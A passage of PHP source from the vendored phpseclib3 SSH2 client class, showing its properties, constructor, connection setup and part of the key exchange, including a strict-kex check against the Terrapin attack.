$signature_format = ''; /** * Interactive Buffer * * @see self::read() * @var string */ private $interactiveBuffer = ''; /** * Current log size * * Should never exceed self::LOG_MAX_SIZE * * @see self::_send_binary_packet() * @see self::_get_binary_packet() * @var int */ private $log_size; /** * Timeout * * @see self::setTimeout() */ protected $timeout; /** * Current Timeout * * @see self::get_channel_packet() */ protected $curTimeout; /** * Keep Alive Interval * * @see self::setKeepAlive() */ private $keepAlive; /** * Real-time log file pointer * * @see self::_append_log() * @var resource|closed-resource */ private $realtime_log_file; /** * Real-time log file size * * @see self::_append_log() * @var int */ private $realtime_log_size; /** * Has the signature been validated? * * @see self::getServerPublicHostKey() * @var bool */ private $signature_validated = \false; /** * Real-time log file wrap boolean * * @see self::_append_log() * @var bool */ private $realtime_log_wrap; /** * Flag to suppress stderr from output * * @see self::enableQuietMode() */ private $quiet_mode = \false; /** * Time of last read/write network activity * * @var float */ private $last_packet = null; /** * Exit status returned from ssh if any * * @var int */ private $exit_status; /** * Flag to request a PTY when using exec() * * @var bool * @see self::enablePTY() */ private $request_pty = \false; /** * Contents of stdError * * @var string */ private $stdErrorLog; /** * The Last Interactive Response * * @see self::_keyboard_interactive_process() * @var string */ private $last_interactive_response = ''; /** * Keyboard Interactive Request / Responses * * @see self::_keyboard_interactive_process() * @var array */ private $keyboard_requests_responses = []; /** * Banner Message * * Quoting from the RFC, "in some jurisdictions, sending a warning message before * authentication may be relevant for getting legal protection." * * @see self::_filter() * @see self::getBannerMessage() * @var string */ private $banner_message = ''; /** * Did read() timeout or return normally? * * @see self::isTimeout() * @var bool */ protected $is_timeout = \false; /** * Log Boundary * * @see self::_format_log() * @var string */ private $log_boundary = ':'; /** * Log Long Width * * @see self::_format_log() * @var int */ private $log_long_width = 65; /** * Log Short Width * * @see self::_format_log() * @var int */ private $log_short_width = 16; /** * Hostname * * @see self::__construct() * @see self::_connect() * @var string */ private $host; /** * Port Number * * @see self::__construct() * @see self::_connect() * @var int */ private $port; /** * Number of columns for terminal window size * * @see self::getWindowColumns() * @see self::setWindowColumns() * @see self::setWindowSize() * @var int */ private $windowColumns = 80; /** * Number of columns for terminal window size * * @see self::getWindowRows() * @see self::setWindowRows() * @see self::setWindowSize() * @var int */ private $windowRows = 24; /** * Crypto Engine * * @see self::setCryptoEngine() * @see self::_key_exchange() * @var int */ private static $crypto_engine = \false; /** * A System_SSH_Agent for use in the SSH2 Agent Forwarding scenario * * @var Agent */ private $agent; /** * Connection storage to replicates ssh2 extension functionality: * {@link http://php.net/manual/en/wrappers.ssh2.php#refsect1-wrappers.ssh2-examples} * * @var array<string, SSH2|\WeakReference<SSH2>> */ private static $connections; /** * Send the identification string first? * * @var bool */ private $send_id_string_first = \true; /** * Send the key exchange initiation packet first? * * @var bool */ private $send_kex_first = \true; /** * Some versions of OpenSSH incorrectly calculate the key size * * @var bool */ private $bad_key_size_fix = \false; /** * Should we try to re-connect to re-establish keys? * * @var bool */ private $login_credentials_finalized = \false; /** * Binary Packet Buffer * * @var object|null */ private $binary_packet_buffer = null; /** * Preferred Signature Format * * @var string|false */ protected $preferred_signature_format = \false; /** * Authentication Credentials * * @var array */ protected $auth = []; /** * Terminal * * @var string */ private $term = 'vt100'; /** * The authentication methods that may productively continue authentication. * * @see https://tools.ietf.org/html/rfc4252#section-5.1 * @var array|null */ private $auth_methods_to_continue = null; /** * Compression method * * @var int */ private $compress = self::NET_SSH2_COMPRESSION_NONE; /** * Decompression method * * @var int */ private $decompress = self::NET_SSH2_COMPRESSION_NONE; /** * Compression context * * @var resource|false|null */ private $compress_context; /** * Decompression context * * @var resource|object */ private $decompress_context; /** * Regenerate Compression Context * * @var bool */ private $regenerate_compression_context = \false; /** * Regenerate Decompression Context * * @var bool */ private $regenerate_decompression_context = \false; /** * Smart multi-factor authentication flag * * @var bool */ private $smartMFA = \true; /** * How many channels are currently opened * * @var int */ private $channelCount = 0; /** * Does the server support multiple channels? If not then error out * when multiple channels are attempted to be opened * * @var bool */ private $errorOnMultipleChannels; /** * Bytes Transferred Since Last Key Exchange * * Includes outbound and inbound totals * * @var int */ private $bytesTransferredSinceLastKEX = 0; /** * After how many transferred byte should phpseclib initiate a key re-exchange? * * @var int */ private $doKeyReexchangeAfterXBytes = 1024 * 1024 * 1024; /** * Has a key re-exchange been initialized? * * @var bool * @access private */ private $keyExchangeInProgress = \false; /** * KEX Buffer * * If we're in the middle of a key exchange we want to buffer any additional packets we get until * the key exchange is over * * @see self::_get_binary_packet() * @see self::_key_exchange() * @see self::exec() * @var array * @access private */ private $kex_buffer = []; /** * Strict KEX Flag * * If kex-strict-s-v00@openssh.com is present in the first KEX packet it need not * be present in subsequent packet * * @see self::_key_exchange() * @see self::exec() * @var array * @access private */ private $strict_kex_flag = \false; /** * Default Constructor. * * $host can either be a string, representing the host, or a stream resource. * If $host is a stream resource then $port doesn't do anything, altho $timeout * still will be used * * @param mixed $host * @param int $port * @param int $timeout * @see self::login() */ public function __construct($host, $port = 22, $timeout = 10) { if (empty(self::$message_numbers)) { self::$message_numbers = [ 1 => 'NET_SSH2_MSG_DISCONNECT', 2 => 'NET_SSH2_MSG_IGNORE', 3 => 'NET_SSH2_MSG_UNIMPLEMENTED', 4 => 'NET_SSH2_MSG_DEBUG', 5 => 'NET_SSH2_MSG_SERVICE_REQUEST', 6 => 'NET_SSH2_MSG_SERVICE_ACCEPT', 7 => 'NET_SSH2_MSG_EXT_INFO', // RFC 8308 20 => 'NET_SSH2_MSG_KEXINIT', 21 => 'NET_SSH2_MSG_NEWKEYS', 30 => 'NET_SSH2_MSG_KEXDH_INIT', 31 => 'NET_SSH2_MSG_KEXDH_REPLY', 50 => 'NET_SSH2_MSG_USERAUTH_REQUEST', 51 => 'NET_SSH2_MSG_USERAUTH_FAILURE', 52 => 'NET_SSH2_MSG_USERAUTH_SUCCESS', 53 => 'NET_SSH2_MSG_USERAUTH_BANNER', 80 => 'NET_SSH2_MSG_GLOBAL_REQUEST', 81 => 'NET_SSH2_MSG_REQUEST_SUCCESS', 82 => 'NET_SSH2_MSG_REQUEST_FAILURE', 90 => 'NET_SSH2_MSG_CHANNEL_OPEN', 91 => 'NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION', 92 => 'NET_SSH2_MSG_CHANNEL_OPEN_FAILURE', 93 => 'NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST', 94 => 'NET_SSH2_MSG_CHANNEL_DATA', 95 => 'NET_SSH2_MSG_CHANNEL_EXTENDED_DATA', 96 => 'NET_SSH2_MSG_CHANNEL_EOF', 97 => 'NET_SSH2_MSG_CHANNEL_CLOSE', 98 => 'NET_SSH2_MSG_CHANNEL_REQUEST', 99 => 'NET_SSH2_MSG_CHANNEL_SUCCESS', 100 => 'NET_SSH2_MSG_CHANNEL_FAILURE', ]; self::$disconnect_reasons = [1 => 'NET_SSH2_DISCONNECT_HOST_NOT_ALLOWED_TO_CONNECT', 2 => 'NET_SSH2_DISCONNECT_PROTOCOL_ERROR', 3 => 'NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED', 4 => 'NET_SSH2_DISCONNECT_RESERVED', 5 => 'NET_SSH2_DISCONNECT_MAC_ERROR', 6 => 'NET_SSH2_DISCONNECT_COMPRESSION_ERROR', 7 => 'NET_SSH2_DISCONNECT_SERVICE_NOT_AVAILABLE', 8 => 'NET_SSH2_DISCONNECT_PROTOCOL_VERSION_NOT_SUPPORTED', 9 => 'NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE', 10 => 'NET_SSH2_DISCONNECT_CONNECTION_LOST', 11 => 'NET_SSH2_DISCONNECT_BY_APPLICATION', 12 => 'NET_SSH2_DISCONNECT_TOO_MANY_CONNECTIONS', 13 => 'NET_SSH2_DISCONNECT_AUTH_CANCELLED_BY_USER', 14 => 'NET_SSH2_DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE', 15 => 'NET_SSH2_DISCONNECT_ILLEGAL_USER_NAME']; self::$channel_open_failure_reasons = [1 => 'NET_SSH2_OPEN_ADMINISTRATIVELY_PROHIBITED']; self::$terminal_modes = [0 => 'NET_SSH2_TTY_OP_END']; self::$channel_extended_data_type_codes = [1 => 'NET_SSH2_EXTENDED_DATA_STDERR']; self::define_array( self::$message_numbers, self::$disconnect_reasons, self::$channel_open_failure_reasons, self::$terminal_modes, self::$channel_extended_data_type_codes, [60 => 'NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ'], [60 => 'NET_SSH2_MSG_USERAUTH_PK_OK'], [60 => 'NET_SSH2_MSG_USERAUTH_INFO_REQUEST', 61 => 'NET_SSH2_MSG_USERAUTH_INFO_RESPONSE'], // RFC 4419 - diffie-hellman-group-exchange-sha{1,256} [30 => 'NET_SSH2_MSG_KEXDH_GEX_REQUEST_OLD', 31 => 'NET_SSH2_MSG_KEXDH_GEX_GROUP', 32 => 'NET_SSH2_MSG_KEXDH_GEX_INIT', 33 => 'NET_SSH2_MSG_KEXDH_GEX_REPLY', 34 => 'NET_SSH2_MSG_KEXDH_GEX_REQUEST'], // RFC 5656 - Elliptic Curves (for curve25519-sha256@libssh.org) [30 => 'NET_SSH2_MSG_KEX_ECDH_INIT', 31 => 'NET_SSH2_MSG_KEX_ECDH_REPLY'] ); } /** * Typehint is required due to a bug in Psalm: https://github.com/vimeo/psalm/issues/7508 * @var \WeakReference<SSH2>|SSH2 */ self::$connections[$this->getResourceId()] = \class_exists('WeakReference') ? \WeakReference::create($this) : $this; $this->timeout = $timeout; if (\is_resource($host)) { $this->fsock = $host; return; } if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($host)) { $this->host = $host; $this->port = $port; } } /** * Set Crypto Engine Mode * * Possible $engine values: * OpenSSL, mcrypt, Eval, PHP * * @param int $engine */ public static function setCryptoEngine($engine) { self::$crypto_engine = $engine; } /** * Send Identification String First * * https://tools.ietf.org/html/rfc4253#section-4.2 says "when the connection has been established, * both sides MUST send an identification string". It does not say which side sends it first. In * theory it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendIdentificationStringFirst() { $this->send_id_string_first = \true; } /** * Send Identification String Last * * https://tools.ietf.org/html/rfc4253#section-4.2 says "when the connection has been established, * both sides MUST send an identification string". It does not say which side sends it first. In * theory it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendIdentificationStringLast() { $this->send_id_string_first = \false; } /** * Send SSH_MSG_KEXINIT First * * https://tools.ietf.org/html/rfc4253#section-7.1 says "key exchange begins by each sending * sending the [SSH_MSG_KEXINIT] packet". It does not say which side sends it first. In theory * it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendKEXINITFirst() { $this->send_kex_first = \true; } /** * Send SSH_MSG_KEXINIT Last * * https://tools.ietf.org/html/rfc4253#section-7.1 says "key exchange begins by each sending * sending the [SSH_MSG_KEXINIT] packet". It does not say which side sends it first. In theory * it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendKEXINITLast() { $this->send_kex_first = \false; } /** * stream_select wrapper * * Quoting https://stackoverflow.com/a/14262151/569976, * "The general approach to `EINTR` is to simply handle the error and retry the operation again" * * This wrapper does that loop */ private static function stream_select(&$read, &$write, &$except, $seconds, $microseconds = null) { $remaining = $seconds + $microseconds / 1000000; $start = \microtime(\true); while (\true) { $result = @\stream_select($read, $write, $except, $seconds, $microseconds); if ($result !== \false) { return $result; } $elapsed = \microtime(\true) - $start; $seconds = (int) ($remaining - \floor($elapsed)); $microseconds = (int) (1000000 * ($remaining - $seconds)); if ($elapsed >= $remaining) { return \false; } } } /** * Connect to an SSHv2 server * * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ private function connect() { if ($this->bitmap & self::MASK_CONSTRUCTOR) { return; } $this->bitmap |= self::MASK_CONSTRUCTOR; $this->curTimeout = $this->timeout; if (!\is_resource($this->fsock)) { $start = \microtime(\true); // with stream_select a timeout of 0 means that no timeout takes place; // with fsockopen a timeout of 0 means that you instantly timeout // to resolve this incompatibility a timeout of 100,000 will be used for fsockopen if timeout is 0 $this->fsock = @\fsockopen($this->host, $this->port, $errno, $errstr, $this->curTimeout == 0 ? 100000 : $this->curTimeout); if (!$this->fsock) { $host = $this->host . ':' . $this->port; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnableToConnectException(\rtrim("Cannot connect to {$host}. Error {$errno}. {$errstr}")); } $elapsed = \microtime(\true) - $start; if ($this->curTimeout) { $this->curTimeout -= $elapsed; if ($this->curTimeout < 0) { throw new \RuntimeException('Connection timed out whilst attempting to open socket connection'); } } if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $this->append_log('(fsockopen took ' . \round($elapsed, 4) . 's)', ''); } } $this->identifier = $this->generate_identifier(); if ($this->send_id_string_first) { $start = \microtime(\true); \fputs($this->fsock, $this->identifier . "\r\n"); $elapsed = \round(\microtime(\true) - $start, 4); if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $this->append_log("-> (network: {$elapsed})", $this->identifier . "\r\n"); } } /* According to the SSH2 specs, "The server MAY send other lines of data before sending the version string. Each line SHOULD be terminated by a Carriage Return and Line Feed. Such lines MUST NOT begin with "SSH-", and SHOULD be encoded in ISO-10646 UTF-8 [RFC3629] (language is not specified). Clients MUST be able to process such lines." */ $data = ''; $totalElapsed = 0; while (!\feof($this->fsock) && !\preg_match('#(.*)^(SSH-(\\d\\.\\d+).*)#ms', $data, $matches)) { $line = ''; while (\true) { if ($this->curTimeout) { if ($this->curTimeout < 0) { throw new \RuntimeException('Connection timed out whilst receiving server identification string'); } $read = [$this->fsock]; $write = $except = null; $start = \microtime(\true); $sec = (int) \floor($this->curTimeout); $usec = (int) (1000000 * ($this->curTimeout - $sec)); if (static::stream_select($read, $write, $except, $sec, $usec) === \false) { throw new \RuntimeException('Connection timed out whilst receiving server identification string'); } $elapsed = \microtime(\true) - $start; $totalElapsed += $elapsed; $this->curTimeout -= $elapsed; } $temp = \stream_get_line($this->fsock, 255, "\n"); if ($temp === \false) { throw new \RuntimeException('Error reading SSH identification string; are you sure you\'re connecting to an SSH server?'); } $line .= $temp; if (\strlen($temp) == 255) { continue; } $line .= "\n"; break; } $data .= $line; } if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $this->append_log('<- (network: ' . \round($totalElapsed, 4) . ')', $line); } if (\feof($this->fsock)) { $this->bitmap = 0; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed by server; are you sure you\'re connected to an SSH server?'); } $extra = $matches[1]; $this->server_identifier = \trim($data, "\r\n"); if (\strlen($extra)) { $this->errors[] = $data; } if (\version_compare($matches[3], '1.99', '<')) { $this->bitmap = 0; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnableToConnectException("Cannot connect to SSH {$matches[3]} servers"); } // Ubuntu's OpenSSH from 5.8 to 6.9 didn't work with multiple channels. see // https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1334916 for more info. // https://lists.ubuntu.com/archives/oneiric-changes/2011-July/005772.html discusses // when consolekit was incorporated. // https://marc.info/?l=openssh-unix-dev&m=163409903417589&w=2 discusses some of the // issues with how Ubuntu incorporated consolekit $pattern = '#^SSH-2\\.0-OpenSSH_([\\d.]+)[^ ]* Ubuntu-.*$#'; $match = \preg_match($pattern, $this->server_identifier, $matches); $match = $match && \version_compare('5.8', $matches[1], '<='); $match = $match && \version_compare('6.9', $matches[1], '>='); $this->errorOnMultipleChannels = $match; if (!$this->send_id_string_first) { $start = \microtime(\true); \fputs($this->fsock, $this->identifier . "\r\n"); $elapsed = \round(\microtime(\true) - $start, 4); if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $this->append_log("-> (network: {$elapsed})", $this->identifier . "\r\n"); } } $this->last_packet = \microtime(\true); if (!$this->send_kex_first) { $response = $this->get_binary_packet_or_close(NET_SSH2_MSG_KEXINIT); $this->key_exchange($response); } if ($this->send_kex_first) { $this->key_exchange(); } $this->bitmap |= self::MASK_CONNECTED; return \true; } /** * Generates the SSH identifier * * You should overwrite this method in your own class if you want to use another identifier * * @return string */ private function generate_identifier() { $identifier = 'SSH-2.0-phpseclib_3.0'; $ext = []; if (\extension_loaded('sodium')) { $ext[] = 'libsodium'; } if (\extension_loaded('openssl')) { $ext[] = 'openssl'; } elseif (\extension_loaded('mcrypt')) { $ext[] = 'mcrypt'; } if (\extension_loaded('gmp')) { $ext[] = 'gmp'; } elseif (\extension_loaded('bcmath')) { $ext[] = 'bcmath'; } if (!empty($ext)) { $identifier .= ' (' . \implode(', ', $ext) . ')'; } return $identifier; } /** * Key Exchange * * @return bool * @param string|bool $kexinit_payload_server optional * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors * @throws NoSupportedAlgorithmsException when none of the algorithms phpseclib has loaded are compatible */ private function key_exchange($kexinit_payload_server = \false) { $this->bytesTransferredSinceLastKEX = 0; $preferred = $this->preferred; // for the initial key exchange $send_kex is true (no key re-exchange has been started) // for phpseclib initiated key exchanges $send_kex is false $send_kex = !$this->keyExchangeInProgress; $this->keyExchangeInProgress = \true; $kex_algorithms = isset($preferred['kex']) ? $preferred['kex'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedKEXAlgorithms(); $server_host_key_algorithms = isset($preferred['hostkey']) ? $preferred['hostkey'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedHostKeyAlgorithms(); $s2c_encryption_algorithms = isset($preferred['server_to_client']['crypt']) ? $preferred['server_to_client']['crypt'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedEncryptionAlgorithms(); $c2s_encryption_algorithms = isset($preferred['client_to_server']['crypt']) ? $preferred['client_to_server']['crypt'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedEncryptionAlgorithms(); $s2c_mac_algorithms = isset($preferred['server_to_client']['mac']) ? $preferred['server_to_client']['mac'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedMACAlgorithms(); $c2s_mac_algorithms = isset($preferred['client_to_server']['mac']) ? $preferred['client_to_server']['mac'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedMACAlgorithms(); $s2c_compression_algorithms = isset($preferred['server_to_client']['comp']) ? $preferred['server_to_client']['comp'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedCompressionAlgorithms(); $c2s_compression_algorithms = isset($preferred['client_to_server']['comp']) ? $preferred['client_to_server']['comp'] : \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::getSupportedCompressionAlgorithms(); $kex_algorithms = \array_merge($kex_algorithms, ['ext-info-c', 'kex-strict-c-v00@openssh.com']); // some SSH servers have buggy implementations of some of the above algorithms switch (\true) { case $this->server_identifier == 'SSH-2.0-SSHD': case \substr($this->server_identifier, 0, 13) == 'SSH-2.0-DLINK': if (!isset($preferred['server_to_client']['mac'])) { $s2c_mac_algorithms = \array_values(\array_diff($s2c_mac_algorithms, ['hmac-sha1-96', 'hmac-md5-96'])); } if (!isset($preferred['client_to_server']['mac'])) { $c2s_mac_algorithms = \array_values(\array_diff($c2s_mac_algorithms, ['hmac-sha1-96', 'hmac-md5-96'])); } break; case \substr($this->server_identifier, 0, 24) == 'SSH-2.0-TurboFTP_SERVER_': if (!isset($preferred['server_to_client']['crypt'])) { $s2c_encryption_algorithms = \array_values(\array_diff($s2c_encryption_algorithms, ['aes128-gcm@openssh.com', 'aes256-gcm@openssh.com'])); } if (!isset($preferred['client_to_server']['crypt'])) { $c2s_encryption_algorithms = \array_values(\array_diff($c2s_encryption_algorithms, ['aes128-gcm@openssh.com', 'aes256-gcm@openssh.com'])); } } $client_cookie = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(16); $kexinit_payload_client = \pack('Ca*', NET_SSH2_MSG_KEXINIT, $client_cookie); $kexinit_payload_client .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2( 'L10bN', $kex_algorithms, $server_host_key_algorithms, $c2s_encryption_algorithms, $s2c_encryption_algorithms, $c2s_mac_algorithms, $s2c_mac_algorithms, $c2s_compression_algorithms, $s2c_compression_algorithms, [], // language, client to server [], // language, server to client \false, // first_kex_packet_follows 0 ); if ($kexinit_payload_server === \false && $send_kex) { $this->send_binary_packet($kexinit_payload_client); while (\true) { $kexinit_payload_server = $this->get_binary_packet(); switch (\ord($kexinit_payload_server[0])) { case NET_SSH2_MSG_KEXINIT: break 2; case NET_SSH2_MSG_DISCONNECT: return $this->handleDisconnect($kexinit_payload_server); } $this->kex_buffer[] = $kexinit_payload_server; } $send_kex = \false; } $response = $kexinit_payload_server; \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($response, 1); // skip past the message number (it should be SSH_MSG_KEXINIT) $server_cookie = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($response, 16); list($this->kex_algorithms, $this->server_host_key_algorithms, $this->encryption_algorithms_client_to_server, $this->encryption_algorithms_server_to_client, $this->mac_algorithms_client_to_server, $this->mac_algorithms_server_to_client, $this->compression_algorithms_client_to_server, $this->compression_algorithms_server_to_client, $this->languages_client_to_server, $this->languages_server_to_client, $first_kex_packet_follows) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('L10C', $response); if (\in_array('kex-strict-s-v00@openssh.com', $this->kex_algorithms)) { if ($this->session_id === \false) { // [kex-strict-s-v00@openssh.com is] only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored // if [it is] present in subsequent SSH2_MSG_KEXINIT packets $this->strict_kex_flag = \true; if (\count($this->kex_buffer)) { throw new \UnexpectedValueException('Possible Terrapin Attack detected'); } } } $this->supported_private_key_algorithms = $this->server_host_key_algorithms; if ($send_kex) { $this->send_binary_packet($kexinit_payload_client); } // we need to decide upon the symmetric encryption algorithms before we do the diffie-hellman key exchange // we don't initialize any crypto-objects, yet - we do that, later. for now, we need the lengths to make the // diffie-hellman key exchange as fast as possible $decrypt = self::array_intersect_first($s2c_encryption_algorithms, $this->encryption_algorithms_server_to_client); if (!$decrypt || ($decryptKeyLength = $this->encryption_algorithm_to_key_size($decrypt)) === null) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible server to client encryption algorithms found'); } $encrypt = self::array_intersect_first($c2s_encryption_algorithms, $this->encryption_algorithms_client_to_server); if (!$encrypt || ($encryptKeyLength = $this->encryption_algorithm_to_key_size($encrypt)) === null) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible client to server encryption algorithms found'); } // through diffie-hellman key exchange a symmetric key is obtained $this->kex_algorithm = self::array_intersect_first($kex_algorithms, $this->kex_algorithms); if ($this->kex_algorithm === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible key exchange algorithms found'); } $server_host_key_algorithm = self::array_intersect_first($server_host_key_algorithms, $this->server_host_key_algorithms); if ($server_host_key_algorithm === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible server host key algorithms found'); } $mac_algorithm_out = self::array_intersect_first($c2s_mac_algorithms, $this->mac_algorithms_client_to_server); if ($mac_algorithm_out === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible client to server message authentication algorithms found'); } $mac_algorithm_in = self::array_intersect_first($s2c_mac_algorithms, $this->mac_algorithms_server_to_client); if ($mac_algorithm_in === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible server to client message authentication algorithms found'); } $compression_map = ['none' => self::NET_SSH2_COMPRESSION_NONE, 'zlib' => self::NET_SSH2_COMPRESSION_ZLIB, 'zlib@openssh.com' => self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH]; $compression_algorithm_in = self::array_intersect_first($s2c_compression_algorithms, $this->compression_algorithms_server_to_client); if ($compression_algorithm_in === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible server to client compression algorithms found'); } $this->decompress = $compression_map[$compression_algorithm_in]; $compression_algorithm_out = self::array_intersect_first($c2s_compression_algorithms, $this->compression_algorithms_client_to_server); if ($compression_algorithm_out === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException('No compatible client to server compression algorithms found'); } $this->compress = $compression_map[$compression_algorithm_out]; switch ($this->kex_algorithm) { case 'diffie-hellman-group15-sha512': case 'diffie-hellman-group16-sha512': case 'diffie-hellman-group17-sha512': case 'diffie-hellman-group18-sha512': case 'ecdh-sha2-nistp521': $kexHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha512'); break; case 'ecdh-sha2-nistp384': $kexHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha384'); break; case 'diffie-hellman-group-exchange-sha256': case 'diffie-hellman-group14-sha256': case 'ecdh-sha2-nistp256': case 'curve25519-sha256@libssh.org': case 'curve25519-sha256': $kexHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); break; default: $kexHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); } // Only relevant in diffie-hellman-group-exchange-sha{1,256}, otherwise empty. $exchange_hash_rfc4419 = ''; if (\strpos($this->kex_algorithm, 'curve25519-sha256') === 0 || \strpos($this->kex_algorithm, 'ecdh-sha2-nistp') === 0) { $curve = \strpos($this->kex_algorithm, 'curve25519-sha256') === 0 ? 'Curve25519' : \substr($this->kex_algorithm, 10); $ourPrivate = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::createKey($curve); $ourPublicBytes = $ourPrivate->getPublicKey()->getEncodedCoordinates(); $clientKexInitMessage = 'NET_SSH2_MSG_KEX_ECDH_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEX_ECDH_REPLY'; } else { if (\strpos($this->kex_algorithm, 'diffie-hellman-group-exchange') === 0) { $dh_group_sizes_packed = \pack('NNN', $this->kex_dh_group_size_min, $this->kex_dh_group_size_preferred, $this->kex_dh_group_size_max); $packet = \pack('Ca*', NET_SSH2_MSG_KEXDH_GEX_REQUEST, $dh_group_sizes_packed); $this->send_binary_packet($packet); $this->updateLogHistory('UNKNOWN (34)', 'NET_SSH2_MSG_KEXDH_GEX_REQUEST'); $response = $this->get_binary_packet_or_close(NET_SSH2_MSG_KEXDH_GEX_GROUP); list($type, $primeBytes, $gBytes) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Css', $response); $this->updateLogHistory('NET_SSH2_MSG_KEXDH_REPLY', 'NET_SSH2_MSG_KEXDH_GEX_GROUP'); $prime = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($primeBytes, -256); $g = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($gBytes, -256); $exchange_hash_rfc4419 = $dh_group_sizes_packed . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $primeBytes, $gBytes); $params = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::createParameters($prime, $g); $clientKexInitMessage = 'NET_SSH2_MSG_KEXDH_GEX_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEXDH_GEX_REPLY'; } else { $params = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::createParameters($this->kex_algorithm); $clientKexInitMessage = 'NET_SSH2_MSG_KEXDH_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEXDH_REPLY'; } $keyLength = \min($kexHash->getLengthInBytes(), \max($encryptKeyLength, $decryptKeyLength)); $ourPrivate = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::createKey($params, 16 * $keyLength); // 2 * 8 * $keyLength $ourPublic = $ourPrivate->getPublicKey()->toBigInteger(); $ourPublicBytes = $ourPublic->toBytes(\true); } $data = \pack('CNa*', \constant($clientKexInitMessage), \strlen($ourPublicBytes), $ourPublicBytes); $this->send_binary_packet($data); switch ($clientKexInitMessage) { case 'NET_SSH2_MSG_KEX_ECDH_INIT': $this->updateLogHistory('NET_SSH2_MSG_KEXDH_INIT', 'NET_SSH2_MSG_KEX_ECDH_INIT'); break; case 'NET_SSH2_MSG_KEXDH_GEX_INIT': $this->updateLogHistory('UNKNOWN (32)', 'NET_SSH2_MSG_KEXDH_GEX_INIT'); } $response = $this->get_binary_packet_or_close(\constant($serverKexReplyMessage)); list($type, $server_public_host_key, $theirPublicBytes, $this->signature) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Csss', $response); switch ($serverKexReplyMessage) { case 'NET_SSH2_MSG_KEX_ECDH_REPLY': $this->updateLogHistory('NET_SSH2_MSG_KEXDH_REPLY', 